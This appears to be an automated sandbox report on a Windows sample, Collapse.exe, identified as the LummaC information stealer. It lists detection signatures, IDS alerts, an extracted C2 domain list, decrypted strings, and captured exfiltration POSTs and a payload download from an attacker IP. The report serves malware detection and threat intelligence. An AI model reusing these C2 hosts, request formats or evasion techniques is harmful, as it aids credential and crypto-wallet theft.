Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Collapse.exe

Overview

General Information

Sample name:Collapse.exe
Analysis ID:1580146
MD5:06bb4e80f74838278ce9467788cc6d94
SHA1:5327b59b123d9e888ae42ef10fcf7fda094909e0
SHA256:09852f87a7032ed63baf8f840d9bb379efb399e42bcdeedf9f4dff5b1b561c31
Tags:exeuser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Collapse.exe (PID: 6672 cmdline: "C:\Users\user\Desktop\Collapse.exe" MD5: 06BB4E80F74838278CE9467788CC6D94)
    • conhost.exe (PID: 3044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Collapse.exe (PID: 3960 cmdline: "C:\Users\user\Desktop\Collapse.exe" MD5: 06BB4E80F74838278CE9467788CC6D94)
    • Collapse.exe (PID: 2756 cmdline: "C:\Users\user\Desktop\Collapse.exe" MD5: 06BB4E80F74838278CE9467788CC6D94)
    • Collapse.exe (PID: 6508 cmdline: "C:\Users\user\Desktop\Collapse.exe" MD5: 06BB4E80F74838278CE9467788CC6D94)
    • Collapse.exe (PID: 5924 cmdline: "C:\Users\user\Desktop\Collapse.exe" MD5: 06BB4E80F74838278CE9467788CC6D94)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["manyrestro.lat", "wordyfindy.lat", "observerfry.lat", "shapestickyr.lat", "talkynicer.lat", "curverpluch.lat", "tentabatte.lat", "slipperyloo.lat", "bashfulacid.lat"], "Build id": "BVnUqo--@distez"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000006.00000003.1375521268.0000000000FA3000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000006.00000003.1374794026.0000000000FA3000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: Collapse.exe PID: 5924JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
            Process Memory Space: Collapse.exe PID: 5924JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Process Memory Space: Collapse.exe PID: 5924JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
                Click to see the 1 entries
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-24T02:17:07.075896+010020283713Unknown Traffic192.168.2.749699172.67.199.72443TCP
                2024-12-24T02:17:09.058332+010020283713Unknown Traffic192.168.2.749700172.67.199.72443TCP
                2024-12-24T02:17:11.496122+010020283713Unknown Traffic192.168.2.749701172.67.199.72443TCP
                2024-12-24T02:17:14.075000+010020283713Unknown Traffic192.168.2.749703172.67.199.72443TCP
                2024-12-24T02:17:16.375867+010020283713Unknown Traffic192.168.2.749709172.67.199.72443TCP
                2024-12-24T02:17:19.765970+010020283713Unknown Traffic192.168.2.749715172.67.199.72443TCP
                2024-12-24T02:17:22.776587+010020283713Unknown Traffic192.168.2.749726172.67.199.72443TCP
                2024-12-24T02:17:26.959139+010020283713Unknown Traffic192.168.2.749740172.67.199.72443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-24T02:17:07.818283+010020546531A Network Trojan was detected192.168.2.749699172.67.199.72443TCP
                2024-12-24T02:17:09.821663+010020546531A Network Trojan was detected192.168.2.749700172.67.199.72443TCP
                2024-12-24T02:17:27.729027+010020546531A Network Trojan was detected192.168.2.749740172.67.199.72443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-24T02:17:07.818283+010020498361A Network Trojan was detected192.168.2.749699172.67.199.72443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-24T02:17:09.821663+010020498121A Network Trojan was detected192.168.2.749700172.67.199.72443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-24T02:17:12.704980+010020480941Malware Command and Control Activity Detected192.168.2.749701172.67.199.72443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 00000000.00000002.1245828484.00000000027ED000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["manyrestro.lat", "wordyfindy.lat", "observerfry.lat", "shapestickyr.lat", "talkynicer.lat", "curverpluch.lat", "tentabatte.lat", "slipperyloo.lat", "bashfulacid.lat"], "Build id": "BVnUqo--@distez"}
                Source: Collapse.exeReversingLabs: Detection: 36%
                Source: Collapse.exeVirustotal: Detection: 31%Perma Link
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.5% probability
                Source: Collapse.exeJoe Sandbox ML: detected
                Source: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: bashfulacid.lat
                Source: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: tentabatte.lat
                Source: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: curverpluch.lat
                Source: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: talkynicer.lat
                Source: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: shapestickyr.lat
                Source: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: manyrestro.lat
                Source: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: slipperyloo.lat
                Source: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: wordyfindy.lat
                Source: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: observerfry.lat
                Source: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000006.00000002.1688715530.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: BVnUqo--@distez
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_004164FD CryptUnprotectData,6_2_004164FD
                Source: Collapse.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49699 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49700 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49701 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49703 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49715 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49726 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49740 version: TLS 1.2
                Source: Collapse.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 0_2_009A0CF8 FindFirstFileExW,0_2_009A0CF8
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 0_2_009A0DA9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_009A0DA9
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 3_2_009A0CF8 FindFirstFileExW,3_2_009A0CF8
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 3_2_009A0DA9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_009A0DA9
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then mov word ptr [eax], cx6_2_00422870
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then mov word ptr [eax], cx6_2_00422870
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then lea ecx, dword ptr [eax+0000069Fh]6_2_00422870
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then movzx esi, word ptr [ebx+eax*2]6_2_0040B8A4
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then movzx esi, word ptr [esp+edx*2]6_2_0043C210
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 6E87DD67h6_2_0043C210
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then mov ecx, dword ptr [esi+08h]6_2_0042DCFD
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then mov eax, edi6_2_00438C90
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then mov esi, edx6_2_004085D0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then mov byte ptr [ecx], bl6_2_0040D643
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then mov ecx, dword ptr [esi+24h]6_2_0040D643
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then mov byte ptr [edi], bl6_2_0040D643
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then movzx esi, word ptr [esp+ecx*2]6_2_0043E720
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then movzx ecx, word ptr [esp+edi*2+34h]6_2_0041B84B
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then jmp eax6_2_0043F800
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then lea ecx, dword ptr [edx+000026D6h]6_2_0041D810
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then cmp al, 2Eh6_2_00426837
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then lea eax, dword ptr [ecx+ecx]6_2_0042C097
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h6_2_0042A8B0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then jmp eax6_2_0043F8B0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then mov esi, ecx6_2_00409140
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then jmp eax6_2_0043F940
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then lea ecx, dword ptr [eax+00006C8Ch]6_2_0042D941
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then mov eax, dword ptr [0044A184h]6_2_0042D14C
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then movzx ebx, byte ptr [edx]6_2_00436150
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then cmp dword ptr [edi+eax*8], 385488F2h6_2_004191D0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then movzx ebx, word ptr [esp+eax*2+04h]6_2_004191D0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then movzx esi, word ptr [esp+eax*2]6_2_0043C980
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then movzx edx, word ptr [ecx]6_2_0043A1A9
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then movzx edx, word ptr [esp+eax*2-000112FCh]6_2_00417A51
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then movzx esi, word ptr [esp+eax*2+00000130h]6_2_00417A51
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then mov esi, eax6_2_00417A51
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then cmp word ptr [ebp+ebx+02h], 0000h6_2_00421200
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then mov word ptr [eax], cx6_2_00421200
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then mov word ptr [ecx], dx6_2_00417303
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then mov word ptr [eax], cx6_2_00417303
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]6_2_0042A320
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then movzx ebx, word ptr [eax]6_2_0041B323
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then mov byte ptr [edi], cl6_2_0041B323
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then add ecx, esi6_2_004253E5
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then mov edi, eax6_2_00402BA0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]6_2_004073B0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]6_2_004073B0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then mov eax, dword ptr [00447218h]6_2_00424C22
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then mov word ptr [eax], cx6_2_0040E425
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then lea ecx, dword ptr [eax-00004752h]6_2_0042BC3F
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then mov byte ptr [edi], al6_2_0042BC3F
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then lea ecx, dword ptr [eax-00004752h]6_2_0042BCC8
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then mov byte ptr [edi], al6_2_0042BCC8
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then movzx edi, word ptr [edx+esi*2]6_2_004274E8
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then movzx edx, word ptr [esp+eax*2+04h]6_2_0043C480
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then mov word ptr [eax], cx6_2_0041B4B9
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then jmp eax6_2_0043F5C0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then movzx esi, word ptr [esp+eax*2+0Ch]6_2_00413DA0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then mov word ptr [eax], cx6_2_0040E65B
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then lea ecx, dword ptr [eax-00007F25h]6_2_004146D0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then jmp eax6_2_0043F6D0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then movzx esi, word ptr [esp+edx*2+1Ch]6_2_004396F0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 4B1BF3DAh6_2_004396F0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then cmp word ptr [eax+ecx+02h], 0000h6_2_004396F0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then movzx edx, word ptr [esp+eax*2]6_2_004406F0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then movzx ebp, word ptr [esp+edx*2]6_2_004406F0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then movzx ecx, word ptr [esp+edi*2+02h]6_2_0043D71C
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then jmp eax6_2_0043F5C0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then movzx esi, word ptr [esp+ecx*2]6_2_0043E7DE
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then movzx esi, word ptr [esp+ecx*2+1Ch]6_2_0043EFF1
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then movsx eax, byte ptr [edx+ebp]6_2_0043EFF1
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 4x nop then mov byte ptr [ecx], al6_2_0042D7B7

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49699 -> 172.67.199.72:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49700 -> 172.67.199.72:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49700 -> 172.67.199.72:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49701 -> 172.67.199.72:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49699 -> 172.67.199.72:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49740 -> 172.67.199.72:443
                Source: Malware configuration extractorURLs: manyrestro.lat
                Source: Malware configuration extractorURLs: wordyfindy.lat
                Source: Malware configuration extractorURLs: observerfry.lat
                Source: Malware configuration extractorURLs: shapestickyr.lat
                Source: Malware configuration extractorURLs: talkynicer.lat
                Source: Malware configuration extractorURLs: curverpluch.lat
                Source: Malware configuration extractorURLs: tentabatte.lat
                Source: Malware configuration extractorURLs: slipperyloo.lat
                Source: Malware configuration extractorURLs: bashfulacid.lat
                Source: Joe Sandbox ViewIP Address: 172.67.199.72 172.67.199.72
                Source: Joe Sandbox ViewIP Address: 147.45.47.81 147.45.47.81
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49709 -> 172.67.199.72:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49701 -> 172.67.199.72:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49715 -> 172.67.199.72:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49703 -> 172.67.199.72:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49699 -> 172.67.199.72:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49700 -> 172.67.199.72:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49726 -> 172.67.199.72:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49740 -> 172.67.199.72:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: observerfry.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: observerfry.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SXXY4QL4J5NLF0GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12828Host: observerfry.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=8JXQ8I4DTVH3RZSSUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15066Host: observerfry.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=B8QW7W633XHP9MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20379Host: observerfry.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=TOXTP5F9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1162Host: observerfry.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=YIZOIU1F9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 552485Host: observerfry.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 84Host: observerfry.lat
                Source: global trafficHTTP traffic detected: GET /conhost.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 147.45.47.81
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /conhost.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 147.45.47.81
                Source: global trafficDNS traffic detected: DNS query: observerfry.lat
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: observerfry.lat
                Source: Collapse.exe, 00000006.00000003.1688020796.0000000001007000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/
                Source: Collapse.exe, 00000006.00000003.1687945451.00000000036AC000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000002.1690030321.00000000036B2000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1688339547.00000000036AE000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1688020796.0000000001007000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000002.1690013146.00000000036AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/conhost.exe
                Source: Collapse.exe, 00000006.00000002.1689404392.0000000001007000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1688020796.0000000001007000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/conhost.exe)
                Source: Collapse.exe, 00000006.00000002.1689404392.0000000001007000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1688020796.0000000001007000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/m
                Source: Collapse.exe, 00000006.00000002.1689404392.0000000001007000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1688020796.0000000001007000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/p
                Source: Collapse.exe, 00000006.00000002.1689170640.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1688591837.0000000000F84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81:80/conhost.exel
                Source: Collapse.exe, 00000006.00000003.1340228879.00000000036C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: Collapse.exe, 00000006.00000003.1340228879.00000000036C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: Collapse.exe, 00000006.00000003.1375521268.0000000000FA3000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1290803924.0000000000FA3000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1403986170.0000000000FA3000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1447252619.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1374794026.0000000000FA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro8
                Source: Collapse.exe, 00000006.00000003.1340228879.00000000036C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: Collapse.exe, 00000006.00000003.1340228879.00000000036C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: Collapse.exe, 00000006.00000003.1340228879.00000000036C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: Collapse.exe, 00000006.00000003.1340228879.00000000036C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: Collapse.exe, 00000006.00000003.1340228879.00000000036C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: Collapse.exe, 00000006.00000003.1340228879.00000000036C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
